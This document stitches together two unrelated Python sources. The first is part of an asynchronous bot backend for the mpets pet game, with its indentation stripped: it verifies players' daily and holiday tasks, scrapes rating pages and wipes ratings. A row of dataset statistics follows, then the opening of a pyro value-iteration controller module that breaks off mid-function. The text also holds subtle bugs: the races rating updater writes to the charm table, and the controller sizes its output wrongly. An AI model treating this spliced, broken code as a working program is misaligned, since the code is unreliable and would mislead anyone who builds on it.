crud.update_user_task(user_task.id, left_time, "waiting")
else:
task_name = f"anketa_{anketa_about}:0"
crud.update_user_task(user_task.id, 0, "waiting")
crud.update_user_task_name(user_task.id, task_name)
async def checking_online_task(mpets, user, user_task):
profile = await mpets.view_profile(user.pet_id)
if not profile["status"]:
return 0
if profile["last_login"] == "online":
task_name = user_task.task_name
if int(task_name.split("_")[1]) == 0:
task_name = "30online_" + str(int(time.time()))
crud.update_user_task_name(user_task.id, task_name)
return 0
else:
task_name = int(task_name.split("_")[1])
left_time = time.time() - task_name
if left_time >= 1800:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name="30online")
else:
left_time = int(left_time // 60)
crud.update_user_task(user_task.id, left_time, "waiting")
else:
crud.update_user_task(user_task.id, 0, "waiting")
crud.update_user_task_name(user_task.id, "30online_0")
async def checking_inOnline_task(mpets, user, user_task):
profile = await mpets.view_profile(user.pet_id)
if not profile["status"]:
return 0
if profile["last_login"] == "online":
task_name = user_task.task_name
h, m = task_name.split("_")[-1].split(":")
current_date = time.strftime("%d %b %Y", time.gmtime(time.time()))
current_date += f' {h}:{m}'
unix_time = int(time.mktime(time.strptime(current_date, '%d %b %Y '
'%H:%M')))
if unix_time - 120 <= int(time.time()) <= unix_time + 120:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name="online")
else:
# timeout
pass
async def checking_getGift_utask(mpets, user, user_task):
gift_id = user_task.task_name.split("_")[-1]
pet_gift = False
if gift_id.isdigit() is False:
return 0
gifts = await mpets.view_gifts(user.pet_id)
if int(gift_id) == 0:
for gift in gifts["players"]:
if "сегодня" in gift["date"]:
pet_gift = True
if pet_gift:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name="get_gift")
else:
gift_id = int(gifts_name[int(gift_id) - 1][0])
for gift in gifts["players"]:
if gift_id in [26, 27, 35]:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 36 or
int(gift["present_id"]) == 26):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 37 or
int(gift["present_id"]) == 27):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 35 or
int(gift["present_id"]) == 38):
pet_gift = True
except Exception:
pass
else:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
int(gift["present_id"]) == int(gift_id):
pet_gift = True
except Exception:
pass
if pet_gift:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name="get_gift")
async def checking_sendGift_utask(mpets, user, user_task, pet_id):
gift_id = user_task.task_name.split("_")[-1]
pet_gift = False
if gift_id.isdigit() is False:
return 0
gifts = await mpets.view_gifts(pet_id)
if int(gift_id) == 0:
for gift in gifts["players"]:
if gift["pet_id"]:
try:
if user.pet_id == int(gift["pet_id"]) and \
"сегодня" in gift["date"]:
pet_gift = True
except Exception:
pass
if pet_gift:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name=user_task.task_name)
return True
else:
gift_id = int(gifts_name[int(gift_id) - 1][0])
for gift in gifts["players"]:
if gift_id in [26, 27, 35]:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 36 or
int(gift["present_id"]) == 26) and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 37 or
int(gift["present_id"]) == 27) and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 35 or
int(gift["present_id"]) == 38) and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
except Exception:
pass
else:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
int(gift["present_id"]) == gift_id and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
except Exception:
pass
if pet_gift:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name=user_task.task_name)
return True
async def start_verify_user(user, cookies):
today = int(datetime.today().strftime("%Y%m%d"))
user_tasks = crud.get_user_tasks(user.user_id, today)
'''user_bot = crud.get_bot(user.user_id)
if user_bot is None:
mpets = MpetsApi()
resp = await mpets.start()
if resp["status"] == "ok":
user_bot = crud.create_bot(user.user_id, resp["pet_id"],
resp["name"], resp["password"])
else:
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при создании бота. Пользователь:"
f" {user.user_id}")
return False
if not user_tasks:
return False
mpets = MpetsApi(user_bot.name, user_bot.password)
resp = await mpets.login()
if resp["status"] != "ok":
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при авторизации бота. Пользователь:"
f" {user.user_id}")
mpets = MpetsApi()
resp = await mpets.start()
if resp["status"] == "ok":
user_bot = crud.update_bot(user.user_id, resp["pet_id"],
resp["name"], resp["password"])
else:
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при создании бота. Пользователь:"
f" {user.user_id}")
return False
mpets = MpetsApi(user_bot.name, user_bot.password)
resp = await mpets.login()
if resp["status"] != "ok":
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при авторизации бота. Пользователь:"
f" {user.user_id}")
mpets = MpetsApi()
await mpets.start()'''
mpets = MpetsApi(cookies=cookies)
# await mpets.start()
for user_task in user_tasks:
try:
if user_task.status == "completed":
continue
elif user_task.status == "timeout":
continue
elif "avatar" in user_task.task_name:
await checking_avatar_task(mpets, user, user_task)
elif "anketa" in user_task.task_name:
await checking_anketa_task(mpets, user, user_task)
elif "30online" in user_task.task_name:
await checking_online_task(mpets, user, user_task)
elif "in_online" in user_task.task_name:
await checking_inOnline_task(mpets, user, user_task)
elif "get_gift" in user_task.task_name or \
"get_random_gift" in user_task.task_name:
await checking_getGift_utask(mpets, user, user_task)
except Exception as e:
logger.error(f"start_verify_user {user.user_id}"
f"task {user_task.task_name}"
f"error {e}")
async def checking_users_tasks():
logger.debug("start checking_users_tasks")
mpets_sessions = []
for i in range(8):
mpets = MpetsApi()
r = await mpets.start()
if r['status']:
mpets_sessions.append(r['cookies'])
while True:
try:
users = crud.get_users_with_status("ok")
tasks, counter = [], 0
time0 = int(time.time())
for i in range(0, len(users)):
user = users[i]
today = int(datetime.today().strftime("%Y%m%d"))
user_tasks = crud.get_user_tasks(user.user_id, today)
if not user_tasks:
continue
task = asyncio.create_task(start_verify_user(user,
mpets_sessions[
random.randint(0, len(mpets_sessions) - 1)]))
tasks.append(task)
if len(tasks) >= 5:
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
elif i + 1 == len(users):
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
total_time = int(time.time() - time0)
crud.health(usertasks=total_time)
await asyncio.sleep(5)
except Exception as e:
logger.error(e)
await asyncio.sleep(10)
async def creating_club_tasks():
logger.debug("start creating_club_tasks")
settings = get_settings()
while True:
try:
today = int(datetime.today().strftime("%Y%m%d"))
user_tasks = crud.get_club_tasks_all(today, "generation")
for user_task in user_tasks:
user = crud.get_user(user_id=user_task.user_id)
club = crud.get_club(club_id=user.club_id)
mpets = await get_mpets_api(club=club, api_key=settings.api_key)
await functions.creation_club_tasks(user_task, mpets)
await asyncio.sleep(3)
except Exception as e:
# raise
logger.error(f"Ошибка при создании задания {e}")
await asyncio.sleep(10)
async def checking_thread():
logger.debug("start checking_thread")
mpets = MpetsApi()
await mpets.start()
thread_id, page = 2600581, 1
while True:
try:
thread = await mpets.thread(thread_id, page)
for msg in thread['messages']:
if crud.get_message(thread_id=thread_id,
message_id=msg['message_id']):
continue
user = crud.get_user_pet_id(msg['pet_id'])
if user is None:
crud.create_play_message(pet_id=msg['pet_id'],
thread_id=thread_id,
message_id=msg['message_id'],
page=page)
continue
last_msg = crud.get_message(thread_id=thread_id,
message_id=int(msg['message_id']) - 1)
if last_msg is None:
pass
else:
if last_msg.pet_id == user.pet_id:
crud.create_play_message(pet_id=msg['pet_id'],
thread_id=thread_id,
message_id=msg['message_id'],
page=page)
continue
today = int(datetime.today().strftime("%Y%m%d"))
user_tasks = crud.get_club_tasks(user.user_id, today, "waiting")
for task in user_tasks:
if task.task_name != "play":
continue
await check_task(user, task, task.progress + 1, "play")
crud.create_play_message(pet_id=msg['pet_id'],
thread_id=thread_id,
message_id=msg['message_id'],
page=page)
if len(thread['messages']) == 15:
page += 1
await asyncio.sleep(3)
except Exception as e:
pass
async def update_charm_rating():
logger.debug("start update_charm_rating")
mpets = MpetsApi()
await mpets.start()
page = 1
time0 = time.time()
while True:
try:
game_time = await mpets.game_time()
if not game_time["status"]:
await asyncio.sleep(5)
continue
if int(game_time["time"].split(":")[1]) % 10 == 0:
await asyncio.sleep(5)
continue
resp = await mpets.best("charm", page)
# elapsed_time = time.time() - time0
# logger.info(f"запрос выполнился за | {elapsed_time}")
if not resp["status"]:
continue
for pet in resp["pets"]:
top = crud.get_charm_place(place=pet["place"])
if top is None:
crud.create_charm_rating(pet_id=pet["pet_id"],
place=pet["place"],
score=pet["beauty"])
continue
today = int(datetime.today().strftime("%Y%m%d"))
user = crud.get_user_pet_id(pet_id=pet["pet_id"])
if user is None:
crud.update_charm_place(pet_id=pet["pet_id"],
place=pet["place"],
score=pet["beauty"])
continue
user_task = crud.get_user_task_name(user_id=user.user_id,
task_name="charm",
today=today)
if user_task is None:
crud.update_charm_place(pet_id=pet["pet_id"],
place=pet["place"],
score=pet["beauty"])
continue
elif user_task.status == "completed":
continue
else:
# если разность больше 0, то игрок должен набрать еще рейтинга
difference = user_task.end - int(pet["score"])
if difference > 0:
end = 0
# количество очков меньше, чем нужно
if user_task.progress < int(pet["score"]):
# количество очков увеличилось
a = int(pet["score"]) - user_task.progress
progress = user_task.progress + a
else:
# количество очков уменьшилось
progress = int(pet["score"])
end = progress + 30
crud.update_user_task(id=user_task.id,
progress=progress)
if end != 0:
crud.update_user_task_end(id=user_task.id,
end=end)
else:
crud.update_user_task(id=user_task.id,
progress=user_task.end,
status="completed")
await functions.add_user_points(user_id=user.user_id,
task_name="charm")
crud.update_charm_place(pet_id=pet["pet_id"],
place=pet["place"],
score=pet["beauty"])
page += 1
if page >= 668:
elapsed_time = int(time.time() - time0)
crud.health(charm=elapsed_time)
page = 1
time0 = time.time()
await asyncio.sleep(1)
except Exception:
pass
async def update_races_rating():
logger.debug("start update_races_rating")
mpets = MpetsApi()
await mpets.start()
page = 1
time0 = time.time()
while True:
try:
game_time = await mpets.game_time()
if not game_time["status"]:
continue
if int(game_time["time"].split(":")[1]) % 10 == 0:
continue
resp = await mpets.best("races", page)
if not resp["status"]:
continue
for pet in resp["pets"]:
top = crud.get_races_place(place=pet["place"])
if top is None:
crud.create_races_rating(pet_id=pet["pet_id"],
place=pet["place"],
score=pet["beauty"])
continue
today = int(datetime.today().strftime("%Y%m%d"))
user = crud.get_user_pet_id(pet_id=pet["pet_id"])
if user is None:
crud.update_races_place(pet_id=pet["pet_id"],
place=pet["place"],
score=pet["beauty"])
continue
user_task = crud.get_user_task_name(user_id=user.user_id,
task_name="races",
today=today)
if user_task is None:
continue
elif user_task.status == "completed":
continue
else:
difference = user_task.end - int(pet["score"])
if difference > 0:
end = 0
# количество очков меньше, чем нужно
if user_task.progress < int(pet["score"]):
# количество очков увеличилось
a = int(pet["score"]) - user_task.progress
progress = user_task.progress + a
else:
# количество очков уменьшилось
progress = int(pet["score"])
end = progress + 30
crud.update_user_task(id=user_task.id,
progress=progress)
if end != 0:
crud.update_user_task_end(id=user_task.id,
end=end)
else:
crud.update_user_task(id=user_task.id,
progress=user_task.end,
status="completed")
await functions.add_user_points(user_id=user.user_id,
task_name="races")
crud.update_charm_place(pet_id=pet["pet_id"],
place=pet["place"],
score=pet["beauty"])
page += 1
if page >= 668:
elapsed_time = int(time.time() - time0)
crud.health(races=elapsed_time)
page = 1
time0 = time.time()
await asyncio.sleep(1)
except Exception:
pass
async def checking_avatar_htask(mpets, user, user_task):
today = int(datetime.today().strftime("%m%d"))
avatar_ids = []
if holiday_1402[0] <= today <= holiday_1402[1]:
prize = holiday_1402_prizes['avatar']
avatar_ids = [4, 8]
elif holiday_2302[0] <= today <= holiday_2302[1]:
prize = holiday_2302_prizes['avatar']
avatar_ids = [6, 7]
elif holiday_308[0] <= today <= holiday_308[1]:
prize = holiday_308_prizes['avatar']
avatar_ids = [0, 1]
elif holiday_401[0] <= today <= holiday_401[1]:
prize = holiday_401_prizes['avatar']
avatar_ids = [5, 0]
elif holiday_501[0] <= today <= holiday_501[1]:
prize = holiday_501_prizes['avatar']
avatar_ids = [1, 0]
profile = await mpets.view_profile(user.pet_id)
if profile["status"] != "ok":
return 0
task_name = user_task.task_name
avatar_id = user_task.task_name.split("_")[-1]
avatar_id = avatar_id.rsplit(":", maxsplit=1)[0]
if int(profile["ava_id"]) in avatar_ids:
ava = task_name.split("_", maxsplit=1)[-1]
start_time = ava.rsplit(":", maxsplit=1)[1]
if int(start_time) == 0:
task_name = f"avatar_{avatar_id}:{int(time.time())}"
crud.update_user_task_name(user_task.id, task_name)
else:
left_time = time.time() - int(start_time)
if left_time >= 86400:
crud.update_user_task(user_task.id, user_task.end, "completed")
crud.add_rewards(user_id=user.user_id, points=2, personal_tasks=1, club_tasks=1)
else:
left_time = int(left_time // 60 // 60)
crud.update_user_task(user_task.id, left_time, "waiting")
else:
task_name = f"avatar_{avatar_id}:0"
crud.update_user_task(user_task.id, 0, "waiting")
crud.update_user_task_name(user_task.id, task_name)
async def checking_anketa_htask(mpets, user, user_task):
try:
today = int(datetime.today().strftime("%m%d"))
smiles = []
if holiday_1402[0] <= today <= holiday_1402[1]:
prize = holiday_1402_prizes['anketa']
smiles = ["❤", "❤️", "♥️"]
elif holiday_2302[0] <= today <= holiday_2302[1]:
prize = holiday_2302_prizes['anketa']
smiles = ["⭐️", "⭐"]
elif holiday_308[0] <= today <= holiday_308[1]:
prize = holiday_308_prizes['anketa']
smiles = ["✿ܓ"]
elif holiday_401[0] <= today <= holiday_401[1]:
prize = holiday_401_prizes['anketa']
smiles = ["Никому не верю"]
elif holiday_501[0] <= today <= holiday_501[1]:
prize = holiday_501_prizes['anketa']
smiles = ["Мир, труд, май! ✿", "Мир, труд, май!✿"]
profile = await mpets.view_anketa(user.pet_id)
if profile["status"] != "ok":
return False
task_name = user_task.task_name
anketa_about = task_name.split("_", maxsplit=1)[-1]
anketa_about = anketa_about.rsplit(":", maxsplit=1)[0]
if profile["about"] in smiles or profile["ank"] in smiles:
ank = task_name.split("_", maxsplit=1)[-1]
start_time = ank.rsplit(":", maxsplit=1)[1]
if int(start_time) == 0:
task_name = f"anketa_{anketa_about}:{int(time.time())}"
crud.update_user_task_name(user_task.id, task_name)
else:
left_time = time.time() - int(start_time)
# logger.debug(f"left_time {left_time}")
if left_time >= 86400:
crud.update_user_task(user_task.id, user_task.end, "completed")
crud.add_rewards(user_id=user.user_id, points=2, personal_tasks=1, club_tasks=1)
else:
left_time = int(left_time // 60 // 60)
crud.update_user_task(user_task.id, left_time, "waiting")
else:
task_name = f"anketa_{anketa_about}:0"
crud.update_user_task(user_task.id, 0, "waiting")
crud.update_user_task_name(user_task.id, task_name)
except Exception as e:
logger.error(f"checking_anketa_htask {user.user_id} "
f"error {e}")
async def checking_exchangeGifts_htask(mpets, user, user_task, date):
progress = user_task.progress
page = 1
today = True
gift_ids = []
if holiday_1402[0] <= date <= holiday_1402[1]:
hdate = holiday_1402[2]
prize = holiday_1402_prizes['gifts']
gift_ids = [11, 34]
elif holiday_2302[0] <= date <= holiday_2302[1]:
hdate = holiday_2302[2]
prize = holiday_2302_prizes['gifts']
gift_ids = [26, 27, 35]
elif holiday_308[0] <= date <= holiday_308[1]:
hdate = holiday_308[2]
prize = holiday_308_prizes['gifts']
gift_ids = [45, 46, 47]
elif holiday_401[0] <= date <= holiday_401[1]:
hdate = holiday_401[2]
prize = holiday_401_prizes['gifts']
gift_ids = [32, 33]
elif holiday_501[0] <= date <= holiday_501[1]:
hdate = holiday_501[2]
prize = holiday_501_prizes['gifts']
gift_ids = [2, 45]
while True:
if today is False:
break
today = False
gifts = await mpets.view_gifts(user.pet_id, page)
try:
g = gifts["players"]
except:
logger.error(f"user {user.user_id} {gifts}")
for gift in gifts["players"]:
if ("вчера" in gift["date"] or "сегодня" in gift["date"]) \
and int(gift["present_id"]) in gift_ids:
today = True
if gift["pet_id"] is None:
continue
for ipage in range(1, 5):
leave = True
another_gifts = await mpets.view_gifts(gift["pet_id"], ipage)
try:
g = another_gifts["players"]
except:
logger.error(f"user {user.user_id} {another_gifts}")
for g in another_gifts["players"]:
if g["pet_id"] is None:
continue
if "вчера" in g["date"] or "сегодня" in g["date"]:
leave = False
if ("вчера" in g["date"] or "сегодня" in g["date"]) \
and int(g["present_id"]) in gift_ids and int(g["pet_id"]) == user.pet_id:
if crud.get_pet_pair(pet_id=user.pet_id,
friend_id=gift["pet_id"],
date=hdate) is None:
crud.create_gift_pair(pet_id=user.pet_id,
friend_id=gift["pet_id"],
present_id=gift["present_id"],
date=hdate)
progress += 1
if leave:
break
page += 1
if progress < user_task.end:
crud.update_user_task(user_task.id, progress, "waiting")
else:
crud.update_user_task(user_task.id, user_task.end, "completed")
crud.add_rewards(user_id=user.user_id, points=2, personal_tasks=1, club_tasks=1)
async def start_checking_holiday_tasks(user, date):
user_tasks = crud.get_user_tasks(user.user_id, date)
user_bot = crud.get_bot(user.user_id)
if user_bot is None:
mpets = MpetsApi()
resp = await mpets.start()
if resp["status"] == "ok":
user_bot = crud.create_bot(user.user_id, resp["pet_id"],
resp["name"], resp["password"])
else:
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при создании бота. Пользователь:"
f" {user.user_id}")
return False
if not user_tasks:
return False
mpets = MpetsApi(user_bot.name, user_bot.password)
resp = await mpets.login()
if resp["status"] != "ok":
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при авторизации бота. Пользователь:"
f" {user.user_id}")
mpets = MpetsApi()
resp = await mpets.start()
if resp["status"] == "ok":
user_bot = crud.update_bot(user.user_id, resp["pet_id"],
resp["name"], resp["password"])
else:
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при создании бота. Пользователь:"
f" {user.user_id}")
return False
mpets = MpetsApi(user_bot.name, user_bot.password)
resp = await mpets.login()
if resp["status"] != "ok":
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при авторизации бота. Пользователь:"
f" {user.user_id}")
mpets = MpetsApi()
await mpets.start()
for user_task in user_tasks:
try:
if user_task.status == "completed":
continue
elif user_task.status == "timeout":
continue
elif "avatar" in user_task.task_name:
await checking_avatar_htask(mpets, user, user_task)
elif "anketa" in user_task.task_name:
await checking_anketa_htask(mpets, user, user_task)
elif "gifts" in user_task.task_name:
await checking_exchangeGifts_htask(mpets, user, user_task, date)
except Exception as e:
logger.error(f"start_checking_holiday_tasks {user.user_id} "
f"task {user_task.task_name} "
f"error {e}")
async def checking_holiday_tasks():
logger.debug("start checking_holiday_tasks")
while True:
try:
today = int(datetime.today().strftime("%m%d"))
if holiday_1402[0] <= today <= holiday_1402[1]:
date = holiday_1402[2]
elif holiday_2302[0] <= today <= holiday_2302[1]:
date = holiday_2302[2]
elif holiday_308[0] <= today <= holiday_308[1]:
date = holiday_308[2]
elif holiday_401[0] <= today <= holiday_401[1]:
date = holiday_401[2]
elif holiday_501[0] <= today <= holiday_501[1]:
date = holiday_501[2]
else:
await asyncio.sleep(120)
continue
users = crud.get_users_with_status(status="ok")
tasks, counter = [], 0
for i in range(0, len(users)):
user = users[i]
user_tasks = crud.get_user_tasks(user_id=user.user_id, today=date)
if not user_tasks:
continue
task = asyncio.create_task(start_checking_holiday_tasks(user=user, date=date))
tasks.append(task)
if len(tasks) >= 10:
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
elif i + 1 == len(users):
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
except Exception as e:
logger.error(e)
await asyncio.sleep(10)
def get_next_user(users):
for user in users:
yield user
async def get_wipe_text_user_rating():
counter, hidden = 1, False
top_users_stats = crud.get_users_stats_order_by_points(limit=30)
text = "🧑 Рейтинг игроков \n\n"
if not top_users_stats:
return "Рейтинг пуст"
users = get_next_user(users=top_users_stats)
last_points = None
while counter <= 10:
try:
user_stats = next(users)
except StopIteration as e:
break
top_user = crud.get_user(user_stats.user_id)
if last_points is None:
# Если в рейтинге есть пользователь с 50 очков и более,
# то активируется более "продвинутый" рейтинг.
if user_stats.points <= 49:
last_points = None
else:
last_points = user_stats.points
text += f"{counter}. {top_user.name} ( {top_user.user_id} ) — {user_stats.points} 🏅\n"
counter += 1
elif last_points == user_stats.points:
last_points = user_stats.points
text += f" {top_user.name} ( {top_user.user_id} ) — {user_stats.points} 🏅\n"
else:
last_points = user_stats.points
text += f"{counter}. {top_user.name} ( {top_user.user_id} ) — {user_stats.points} 🏅\n"
counter += 1
return text
async def get_wipe_text_club_rating():
counter = 1
clubs = crud.get_clubs_stats_order_by_points()
text = "🏠 Рейтинг клубов.\n\n"
if not clubs:
return "❗ Рейтинг пуст."
for club_stats in clubs:
club = crud.get_club(club_stats.club_id)
text += f"{counter}. {club.name} ( {club.club_id} ) — {club_stats.total_tasks} ⛱/" \
f"{club_stats.points}🎈\n"
counter += 1
return text
async def wipe():
wipe = False
while True:
today = int(datetime.today().strftime("%m%d"))
if wipe is True:
break
if today == 906:
notice(await get_wipe_text_user_rating())
notice(await get_wipe_text_club_rating())
crud.wipe()
wipe = True
await asyncio.sleep(10) | 43.377976 | 111 | 0.495043 | 6,536 | 58,300 | 4.189871 | 0.054009 | 0.066898 | 0.020814 | 0.026292 | 0.802556 | 0.764104 | 0.745408 | 0.711923 | 0.677451 | 0.655468 | 0 | 0.020781 | 0.403242 | 58,300 | 1,344 | 112 | 43.377976 | 0.765658 | 0.010497 | 0 | 0.705054 | 0 | 0.002486 | 0.081558 | 0.006779 | 0 | 0 | 0 | 0 | 0 | 1 | 0.000829 | false | 0.017399 | 0.010771 | 0 | 0.038111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
"""
Created on Wed Jul 12 12:09:37 2017
@author: alxgr
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.interpolate import RectBivariateSpline as interpol2D
from scipy.interpolate import griddata
from scipy.interpolate import LinearNDInterpolator
from pyro.control import controller
'''
################################################################################
'''
class ViController( controller.StaticController ) :
    """
    Value iteration tabular feedback controller
    ---------------------------------------
    r : reference signal vector k x 1
    y : sensor signal vector m x 1
    u : control inputs vector p x 1
    t : time 1 x 1
    ---------------------------------------
    u = c( y , r , t )
    """

    ############################
    def __init__(self, k , m , p):
        """ """

        # Dimensions
        self.k = k
        self.m = m
        self.p = p

        controller.StaticController.__init__(self, self.k, self.m, self.p)

        # Label
        self.name = 'Value Iteration Controller'

    #############################
    def vi_law( self , x ):
        """ Feedback law (placeholder: returns zero until a policy is loaded) """

        u = np.zeros(self.m) # Control input vector

        return u

    #############################
    def c( self , y , r , t = 0 ):
        """ State feedback (y=x) - no reference - time independent """

        x = y
        u = self.vi_law( x )

        return u
class ValueIteration_2D:
    """ Dynamic programming for a 2D continuous dynamic system with one continuous input u """

    ############################
    def __init__(self, grid_sys , cost_function ):

        # Dynamic system
        self.grid_sys = grid_sys     # Discretized dynamic system class
        self.sys      = grid_sys.sys # Base dynamic system class

        # Controller
        self.ctl = ViController( self.sys.n , self.sys.m , self.sys.n )

        # Cost function
        self.cf = cost_function

        # Print params
        self.fontsize = 10

        # Options
        self.uselookuptable = True
##############################
def initialize(self):
""" initialize cost-to-go and policy """
self.J = np.zeros( self.grid_sys.xgriddim , dtype = float )
self.action_policy = np.zeros( self.grid_sys.xgriddim , dtype = int )
self.Jnew = self.J.copy()
self.Jplot = self.J.copy()
# Initial evaluation
# For all state nodes
for node in range( self.grid_sys.nodes_n ):
x = self.grid_sys.nodes_state[ node , : ]
i = self.grid_sys.nodes_index[ node , 0 ]
j = self.grid_sys.nodes_index[ node , 1 ]
# Final Cost
self.J[i,j] = self.cf.h( x )
###############################
def compute_step(self):
""" One step of value iteration """
# Get interpolation of current cost space
J_interpol = interpol2D( self.grid_sys.xd[0] , self.grid_sys.xd[1] , self.J , bbox=[None, None, None, None], kx=1, ky=1,)
# For all state nodes
for node in range( self.grid_sys.nodes_n ):
x = self.grid_sys.nodes_state[ node , : ]
i = self.grid_sys.nodes_index[ node , 0 ]
j = self.grid_sys.nodes_index[ node , 1 ]
# One-step costs - Q values
Q = np.zeros( self.grid_sys.actions_n )
# For all control actions
for action in range( self.grid_sys.actions_n ):
u = self.grid_sys.actions_input[ action , : ]
# Compute next state and validity of the action
if self.uselookuptable:
x_next = self.grid_sys.x_next[node,action,:]
action_isok = self.grid_sys.action_isok[node,action]
else:
x_next = self.sys.f( x , u ) * self.grid_sys.dt + x
x_ok = self.sys.isavalidstate(x_next)
u_ok = self.sys.isavalidinput(x,u)
action_isok = ( u_ok & x_ok )
# If the current option is allowable
if action_isok:
J_next = J_interpol( x_next[0] , x_next[1] )
# Cost-to-go of a given action
Q[action] = self.cf.g( x , u ) + J_next[0,0]
else:
# Not allowable states or inputs/states combinations
Q[action] = self.cf.INF
self.Jnew[i,j] = Q.min()
self.action_policy[i,j] = Q.argmin()
# Impossible situation (unacceptable for any control action)
if self.Jnew[i,j] > (self.cf.INF-1) :
self.action_policy[i,j] = -1
# Convergence check
delta = self.J - self.Jnew
j_max = self.Jnew.max()
delta_max = delta.max()
delta_min = delta.min()
print('Max:',j_max,'Delta max:',delta_max, 'Delta min:',delta_min)
self.J = self.Jnew.copy()
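The Bellman backup that compute_step() performs can be illustrated on a toy tabular problem. The sketch below is a hypothetical stand-in with no pyro dependency: a 3-state, 3-action deterministic grid where invalid transitions get an "infinite" cost, mirroring the Q-value update `Q[action] = g(x, u) + J(x_next)` followed by `Jnew = Q.min()` and `policy = Q.argmin()`.

```python
import numpy as np

# Toy stand-in (not pyro): one Bellman backup like compute_step().
# States x in {0, 1, 2}, actions u in {-1, 0, +1}, deterministic
# dynamics x_next = x + u, stage cost g(x, u) = |x| + 0.1|u|, and an
# "infinite" cost for actions that leave the grid (like cf.INF).
INF = 1e6
states = [0, 1, 2]
actions = [-1, 0, 1]
J = np.array([0.0, 1.0, 2.0])           # current cost-to-go guess

Jnew = np.zeros_like(J)
policy = np.zeros(len(states), dtype=int)
for i, x in enumerate(states):
    Q = np.zeros(len(actions))          # one-step Q values
    for a, u in enumerate(actions):
        x_next = x + u
        if 0 <= x_next <= 2:            # validity check
            Q[a] = abs(x) + 0.1 * abs(u) + J[x_next]
        else:
            Q[a] = INF                  # disallowed transition
    Jnew[i] = Q.min()                   # greedy backup
    policy[i] = Q.argmin()

print(Jnew, policy)
```

Iterating this backup to a fixed point yields the optimal cost-to-go; the real class adds grid interpolation because `x_next` generally falls between nodes.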
################################
def assign_interpol_controller(self):
""" controller from optimal actions """
# Compute grid of u
self.u_policy_grid = []
# for all inputs
for k in range(self.sys.m):
self.u_policy_grid.append( np.zeros( self.grid_sys.xgriddim , dtype = float ) )
# For all state nodes
for node in range( self.grid_sys.nodes_n ):
i = self.grid_sys.nodes_index[ node , 0 ]
j = self.grid_sys.nodes_index[ node , 1 ]
# If no action is good
if ( self.action_policy[i,j] == -1 ):
# for all inputs
for k in range(self.sys.m):
self.u_policy_grid[k][i,j] = 0
else:
# for all inputs
for k in range(self.sys.m):
self.u_policy_grid[k][i,j] = self.grid_sys.actions_input[ self.action_policy[i,j] , k ]
# Compute Interpol function
self.x2u_interpol_functions = []
# for all inputs
for k in range(self.sys.m):
self.x2u_interpol_functions.append(
interpol2D( self.grid_sys.xd[0] ,
self.grid_sys.xd[1] ,
self.u_policy_grid[k] ,
bbox=[None, None, None, None],
kx=1, ky=1,) )
# Assign controller
self.ctl.vi_law = self.vi_law
################################
def vi_law(self, x , t = 0 ):
""" controller from optimal actions """
u = np.zeros( self.sys.m )
# for all inputs
for k in range(self.sys.m):
u[k] = self.x2u_interpol_functions[k]( x[0] , x[1] )[0,0] # spline call returns a (1,1) array
return u
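The lookup above relies on the degree-1 (bilinear) splines built in assign_interpol_controller(). A minimal self-contained sketch of that interpolation, using a hypothetical linear policy u(x0, x1) = 2*x0 + 3*x1 that a bilinear spline reproduces exactly between grid nodes:

```python
import numpy as np
from scipy.interpolate import RectBivariateSpline

# Policy grid sampled from a hypothetical linear law (illustrative only)
x0 = np.linspace(0.0, 1.0, 5)
x1 = np.linspace(0.0, 2.0, 5)
U = 2.0 * x0[:, None] + 3.0 * x1[None, :]     # shape (5, 5), U[i, j] = u(x0[i], x1[j])

# kx=ky=1 gives piecewise-bilinear interpolation, as in the class above
x2u = RectBivariateSpline(x0, x1, U, kx=1, ky=1)

# Off-grid query, mirroring vi_law(); __call__ returns a 2-D array
u = x2u(0.37, 1.21)[0, 0]
print(u)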
################################
def compute_steps(self, l = 50, plot = False):
""" compute number of step """
for i in range(l):
print('Step:',i)
self.compute_step()
################################
def plot_cost2go(self, maxJ = 1000 ):
""" print graphic """
xname = self.sys.state_label[0] + ' ' + self.sys.state_units[0]
yname = self.sys.state_label[1] + ' ' + self.sys.state_units[1]
self.Jplot = self.J.copy()
## Saturation function for cost
for i in range(self.grid_sys.xgriddim[0]):
